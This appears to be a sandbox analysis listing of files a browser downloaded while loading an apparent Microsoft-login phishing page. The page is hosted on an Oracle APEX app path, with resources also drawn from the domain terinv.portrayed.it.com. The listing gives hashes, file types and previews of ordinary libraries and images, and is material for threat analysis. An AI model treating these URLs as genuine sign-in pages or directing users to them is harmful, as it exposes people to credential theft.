                                                                          Preview:.fa,.fa:before{display:inline-block;vertical-align:top}@font-face{font-family:'Font APEX Small';src:url(../fonts/Font-APEX-Small.woff2?) format('woff2'),url(../fonts/Font-APEX-Small.woff?) format('woff');font-weight:400;font-style:normal}@font-face{font-family:'Font APEX Large';src:url(../fonts/Font-APEX-Large.woff2?) format('woff2'),url(../fonts/Font-APEX-Large.woff?) format('woff');font-weight:400;font-style:normal}.fa{speak:none;font-style:normal;font-weight:400;font-variant:normal;text-transform:none;text-rendering:auto;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa,.fa.fa-sm,.force-fa-lg .fa.fa-sm{--a-icon-size:16px;font-size:16px}.fa.fa-sm:after,.fa.fa-sm:before,.fa:after,.fa:before,.force-fa-lg .fa.fa-sm:after,.force-fa-lg .fa.fa-sm:before{font-family:'Font APEX Small'!important}.fa.fa-lg,.force-fa-lg .fa{--a-icon-size:32px;font-size:32px}.fa.fa-lg:after,.fa.fa-lg:before,.force-fa-lg .fa:after,.force-fa-lg .fa:before{font-family:'Font APEX
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (4309)
                                                                          Category:downloaded
                                                                          Size (bytes):8361
                                                                          Entropy (8bit):5.1590518108990455
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:55DC370A2B11495663B6309B642FE40D
                                                                          SHA1:B78A94E84FD4E48B956D1839CE3FA8F19D5DBE38
                                                                          SHA-256:9A47821A3A6D7CD0B9358B20F5A2987DC35E009246ACBE766D7BE9070B971769
                                                                          SHA-512:72C4F4E175E11F05407742270D1DC0BE11D60CCF362934A802F68F83277AD94AE0D312D3BD293F1DC53DD8098142D32C07563F6850F9230F4180CA291EA789FA
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://apex.oracle.com/pls/apex/r/capsicure/file-document/sw.js?v=24.2.2-15618029960919&lang=en
                                                                          Preview:let apex = {};.apex.sw = {};.apex.sw.CORE_CACHE_MATCHER = 'https:\u002F\u002Fstatic.oracle.com\u002Fcdn\u002Fapex\u002F24.2.2\u002F';.apex.sw.CORE_CACHE_PREFIX = "APEX-CORE-";.apex.sw.CORE_CACHE_NAME = apex.sw.CORE_CACHE_PREFIX + '24.2.2';.apex.sw.APP_CACHE_MATCHER = "254038/files/static/v";.apex.sw.APP_CACHE_PREFIX = "APEX-APP-254038-v";.apex.sw.appCacheNeedsCleanup = true;.apex.sw.cleanAPEXCaches = () => {. caches.keys().then(cacheNames => Promise.all(. cacheNames.map(cacheName => {. if (cacheName.startsWith(apex.sw.CORE_CACHE_PREFIX) && cacheName !== apex.sw.CORE_CACHE_NAME) {. return caches.delete(cacheName);. }. }). ));.};.apex.sw.cleanAppCaches = (appCacheName) => {. if (apex.sw.appCacheNeedsCleanup) {. apex.sw.appCacheNeedsCleanup = false;. caches.keys().then(cacheNames => Promise.all(. cacheNames.map(cacheName => {. if (cacheName.startsWith(apex.sw.APP_CACHE_PREFIX) && cacheName !== appCacheName) {. return caches.delete(cache
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                          Category:downloaded
                                                                          Size (bytes):17174
                                                                          Entropy (8bit):2.9129715116732746
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (48664)
                                                                          Category:downloaded
                                                                          Size (bytes):48944
                                                                          Entropy (8bit):5.272507874206726
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                          SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                          SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                          SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                          Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65475)
                                                                          Category:downloaded
                                                                          Size (bytes):74727
                                                                          Entropy (8bit):4.792915834853512
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:DA8FCBC461B9C06B4A035799C83294E1
                                                                          SHA1:2F12CF85A365A4837842837136DD58D85AAD7786
                                                                          SHA-256:78647C6B30FB6B9336F082F5152760A4BDC767157EAE4258AD84F866A9C25C6B
                                                                          SHA-512:E75AA4F3D56E6F317DE39E53657C00EB20C29FA3257465D3D672B6C4FAEE0F94EF951D189AE0745ED628588CFF0CBE5597B1661B36427E06058049029FF446CB
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://static.oracle.com/cdn/apex/24.2.2/themes/theme_42/24.2/css/Vita.min.css?v=24.2.2
                                                                          Preview:/*!. Copyright (c) 2014, 2023, Oracle and/or its affiliates.. */:root{--a-base-font-weight-semibold:600;--a-icon-size:1rem;--a-button-border-radius:.125rem;--a-button-padding-y:.5rem;--a-button-padding-x:.75rem;--a-button-font-size:.75rem;--a-button-line-height:1rem;--a-button-gap-x:.25rem;--a-button-icon-spacing:.375rem;--a-button-icon-size:1rem;--a-cv-grid-gap:1rem;--a-cv-item-width:20rem;--a-cv-border-radius:.25rem;--a-cv-shadow:var(--ut-shadow-sm);--a-cv-header-item-spacing-x:.75rem;--a-cv-icon-spacer:calc(var(--a-cv-icon-container-size, 1rem) + var(--a-cv-header-item-spacing-x, .75rem));--a-cv-initials-size:2rem;--a-cv-initials-font-size:.875rem;--a-cv-title-font-size:1rem;--a-cv-title-line-height:1.25rem;--a-cv-badge-font-size:.75rem;--a-cv-badge-background-color:rgba(0,0,0,.1);--a-checkbox-size:1rem;--a-checkbox-label-font-size:.75rem;--a-checkbox-border-radius:.125rem;--a-checkbox-icon-size:.75rem;--a-checkbox-indeterminate-width:.625rem;--a-checkbox-indeterminate-height:.125re
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 28 x 3, 8-bit/color RGB, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):61
                                                                          Entropy (8bit):4.068159130770306
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:353858FF7B8F3E3C5880CF071497F02E
                                                                          SHA1:03E32F86EE5D42FBE1BC0ECE462EFBA2C2AD4688
                                                                          SHA-256:00E592825A688E310C0B58B3155F93FC6F31A678D5F466A9D3218D43ACB683FD
                                                                          SHA-512:17BA98158E5ABA32993F78916DD7D9B013429DE722B21CD631F3693732751442CDB4B1BAB97B7DA1C66746AA20D26ABCF188E395137F3B684226151497A40BD2
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/930c89eabd78adac/1744731599793/b6bAAss2ZvlWZK7
                                                                          Preview:.PNG........IHDR.....................IDAT.....$.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (19015)
                                                                          Category:downloaded
                                                                          Size (bytes):19188
                                                                          Entropy (8bit):5.212814407014048
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                          SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                          SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                          SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                          Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):650
                                                                          Entropy (8bit):7.536710411149275
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:C66F7F4BD398CECA1AC2553F49D7D90E
                                                                          SHA1:D59FE5E8A33B9D9FA954AD5DCBBAE55092EC6D91
                                                                          SHA-256:56A36CFE9616F4696108A237A932718783F3E4AE2AE41819D5C0CEC15CAF5559
                                                                          SHA-512:467074BE026DB2D22C5B26DA4AC98BC7609DC38165D8D37FD9E9A0F96E76835424AD14B7F215C3EF990539D067A71BEB47227C3B13EEBDB7B662604751B20EAB
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://apex.oracle.com/pls/apex/r/capsicure/254038/files/static/v6/icons/app-icon-32.png
                                                                          Preview:.PNG........IHDR... ... .....szz.....sRGB........DIDATXG.=h.a...ob..6......&..J.X.Z.....8X.;.J...."89Y.q..I.mEK(bim.V...I%.^...........w...q.....y....Q..Et..n.6.k....6XUo..{..2.C~......S..*..r... ...Pi.....:L|......,.C....b......R.......p...7RX.]@g...6P.k..x.../|......;Wa..x}k.v......H.N..r../.a....3..l..p..sN[.........R..p.;..7..EeqG[.n......Y{....).........._g!...V....o.@sG..|1)>.{./..(....p...#)..6..R,.<..cG).U<...$k...~....'..5.k.H..Df).....p.]...Z....6....h....:.=...V....8.r.)..A.B..n..&k.......\!..A/..~EvE...0.M...5....H..0dk.h...0.......u....!.....Yc...6...hb_Z........2.\......&A..P.P.............m..;.).....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):422300
                                                                          Entropy (8bit):4.972706753606941
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:C9A19E7911E6FAAC26145C6C4FBE6440
                                                                          SHA1:1E88E7A98BDD72C9124E6BA330FE2F8C69A98484
                                                                          SHA-256:E72B5D990342099004FEF47DDE2C81918EE8984DB4D418DF0DF5591EBF150DCB
                                                                          SHA-512:B3B8711EC7C7B5373E20523B8A9071150DE33CD853285A30BA10AE06C493E4861D978A6F72F1C85C14CB10ABDD4BDC6365E50DEABAD3D4FE5FE3EBD0CFEDDAF9
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://static.oracle.com/cdn/apex/24.2.2/app_ui/css/Core.min.css?v=24.2.2
                                                                          Preview:@charset "UTF-8";.u-pullLeft{float:left!important}.u-pullRight{float:right!important}.u-alignTop{vertical-align:top!important}.u-alignMiddle{vertical-align:middle!important}.u-alignBaseline{vertical-align:baseline!important}.u-alignBottom{vertical-align:bottom!important}.u-hidden{display:none!important}.u-visible{visibility:visible!important}.u-tE,.u-tR,.u-textEnd,.u-textRight{text-align:end!important}.u-tL,.u-tS,.u-textLeft,.u-textStart{text-align:start!important}.u-tC,.u-textCenter{text-align:center!important}.u-textUpper{text-transform:uppercase!important}.u-textLower{text-transform:lowercase!important}.u-textInitCap{text-transform:capitalize!important}.u-fontWeightNormal,.u-fwNormal{font-weight:var(--a-base-font-weight-normal,normal)!important}.u-fixedFont{font-family:var(--a-base-font-family-mono,monospace)!important}.u-nowrap{white-space:nowrap!important}.u-bold,.u-strong{font-weight:700!important}.u-em,.u-italics{font-style:italic!important}.u-underline{text-decoration:underline
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):2309
                                                                          Entropy (8bit):3.9533709859154516
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:26A555918CCCAC480C5DC4845ECC04E1
                                                                          SHA1:3B9F8C9C19902E4751C392E8764F612ED60F2818
                                                                          SHA-256:FF8A819AC9081D67E353BC9FC2654A583A5A0631EA6EB617A130ECC9BF8B010A
                                                                          SHA-512:8F4F894FAE992AAA001D6CDE538829A3153BE16672CEACD4315AEE932025EA1814A9AB6F08BCE0B40C34BE76FACDC6535AE5FB52CC20A7FFC36041A28B817012
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://mailmeteor.com/logos/assets/PNG/Microsoft_Logo_512px.png
                                                                          Preview:.PNG........IHDR..............x......pHYs.................sRGB.........gAMA......a.....IDATx...1.]U.....`#d.......^..t.N...8.;;..A...T73xE.@ ;7."..9$.......^.............................................|......_...<..D...?.}?....G..._.8.z...o_.<........z....9.^.}..2.i..#.3............$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65475)
                                                                          Category:downloaded
                                                                          Size (bytes):577882
                                                                          Entropy (8bit):4.987784968457172
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:668E92F7E94CE0C672AD32CAD615922A
                                                                          SHA1:A969715B0CE2D155D7AFE50848387D9CF432022A
                                                                          SHA-256:D6A40287BB4C29D6D919B449EDD3B06731F0C55F46229E455F8D363068DB4BD2
                                                                          SHA-512:9A8FC55E4274049F29A95522340436922E0C37F478C185507363813BA19089EBFC75831ACDE9027F61F0AEF7FB93D1F7DBE1EAA45B6A1D74566F7F779877C52D
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://static.oracle.com/cdn/apex/24.2.2/themes/theme_42/24.2/css/Core.min.css?v=24.2.2
                                                                          Preview:/*!. Copyright (c) 2014, 2023, Oracle and/or its affiliates.. */:root{--js-mq-xs:480px;--js-mq-sm:640px;--js-mq-md:768px;--js-mq-lg:992px;--js-mq-xl:1200px;--js-mq-xxl:1400px;--js-sticky-top:0rem;--js-page-title-height:0rem;color-scheme:var(--ut-color-scheme,normal);--a-base-font-family:system-ui,-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",sans-serif;--a-base-font-family-serif:"Iowan Old Style","Apple Garamond",Baskerville,"Times New Roman","Droid Serif",Times,"Source Serif Pro",serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--a-base-font-family-mono:ui-monospace,"Menlo","Consolas",mono-space,monospace;--a-base-link-text-color:var(--ut-link-text-color);--a-palette-primary:var(--ut-palette-primary);--a-palette-primary-contrast:var(--ut-palette-primary-contrast);--a-palette-primary-shade:var(--ut-palette-primary-shade);--a-palette-danger:var(--ut-palette-danger);--a-palette-danger-contrast:var(--ut-pal
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):196
                                                                          Entropy (8bit):5.098952451791238
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:62962DAA1B19BBCC2DB10B7BFD531EA6
                                                                          SHA1:D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
                                                                          SHA-256:80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
                                                                          SHA-512:9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://terinv.portrayed.it.com/favicon.ico
                                                                          Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 2016 x 2016, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):21873
                                                                          Entropy (8bit):2.877142515573533
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:568F3323A159C49C955A6E9E5CE8AC4D
                                                                          SHA1:9F2A67B5CC72217B67EBB5C0B63556D70C4795C3
                                                                          SHA-256:4E19539141237AAB02BA7D5E9657823C29907581024BADB76B1026F739BDC7B5
                                                                          SHA-512:00F9B53896F031CACC067061DD39AB3E7EDD0FD450456029212A0649F6A1A5C2895D7CDB72214851F63529D3E22BDADD23C0A991AB32DF55C8E8B646D789B42B
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://res.cloudinary.com/dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png
                                                                          Preview:.PNG........IHDR...............A.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:D102A13741CE11E6A31DDAB08C35506E" xmpMM:DocumentID="xmp.did:D102A13841CE11E6A31DDAB08C35506E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D102A13541CE11E6A31DDAB08C35506E" stRef:documentID="xmp.did:D102A13641CE11E6A31DDAB08C35506E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.A....Q.IDATx...?..Q.........0..H.B.lcVA5....PLc...VD.EC.5.`.;..y.sN..or..t:........>gl.........<...........<.........x...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                          Category:downloaded
                                                                          Size (bytes):621
                                                                          Entropy (8bit):7.673946009263606
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:4761405717E938D7E7400BB15715DB1E
                                                                          SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                          SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                          SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                                                          Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (32012)
                                                                          Category:downloaded
                                                                          Size (bytes):69597
                                                                          Entropy (8bit):5.369216080582935
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                          SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                          SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                          SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                          Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 1920 x 1080, 8-bit/color RGB, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):214581
                                                                          Entropy (8bit):7.989476951155978
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:73E4A57308882BB368A1E2F49E58497F
                                                                          SHA1:99CEF0948C0A6114982E66D28AD311CA95D6F09C
                                                                          SHA-256:759C1FA1BBE8316C91FE672EE390CA824622A3CB5D4F6FE74B996677B6417D9C
                                                                          SHA-512:2B2912E924EDC40BFFA1B4B722320B7C4F38A51DF4F11B3A20782857AA9EFCD2FD8D6B82A2D7F20A68BBB496A9A232AA31F707D91DC411868C674CB18BF83904
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:.PNG........IHDR.......8.....g.V.....pHYs...#...#.x.?v..E.IDATx..........;..Gu........k......[.>r.I.....H.,l,..M`S:.:.o....."...HX......YR?.....A>W......6..w...N..Hi......~..L...i*..v.2.J../V..6......g.i.v.....o...w.8.Et..3.q.....F.sm..\.t.....5...k.M...Q....f...-...p.:.=...K..%.]...C..9t.Q..v.....|=....M..O..~.GL.X.~]4.(O_......Q...6.&.E;..b`._.o..U....UO....yZ...@o.<^csD7}.......m`l.......Z..9cc.O&aLO.......G..&......N.j.s.).....:...q...V7.w,..;...fLJ....m..'.]....J.D..i.t.B...@o.<^Q.Y.,+.@....9..x..6.NBp.9.b........Z......q.I..k...[.............;..U.n.....Gy..C..[z..V&...O...;.:...z......x.y.g...O.s..Fa.*.......7...J......k........TsT.3..[...#.u........D...A.....*mn.......S.C...7}..M.g.2..p.g.h.s...!..?..../..C..^.G../..[H.b...o.l.un...1.H#J.3.^...y.N...B.:..m.....6.~.6.....~z....:...z......:s..|..b...Y...2.._+*... ..ah....y..K)`M6z..n.?...;.[...H.......).T.1..b.5s.kW.za..A.u.C.a.h.h'=jXzV.Q../.@o.<X.>..b................wn<c....&R
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (48122)
                                                                          Category:downloaded
                                                                          Size (bytes):48123
                                                                          Entropy (8bit):5.342871346104663
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:D00E161860FF36CF8482D4768E280CAB
                                                                          SHA1:A6D5B477886524767E67D3EDEE385CD2C9F41A54
                                                                          SHA-256:CA540BF2EBCFB08C9C8C92512C58707F1A62A572EFD7AC409CBA2229B55F012C
                                                                          SHA-512:6EE0351824C3FDF07C1C3A2C8FB2971F970DD24DCE92DC905A5E2D18EB82F16F93428B2A7445BB892D580A6B7D85D9BF0D9DAD0ED86E4D106B709E5D89339BA9
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/b/580ba44007a6/api.js
                                                                          Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function P(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):P(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Pe(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (22754)
                                                                          Category:downloaded
                                                                          Size (bytes):22819
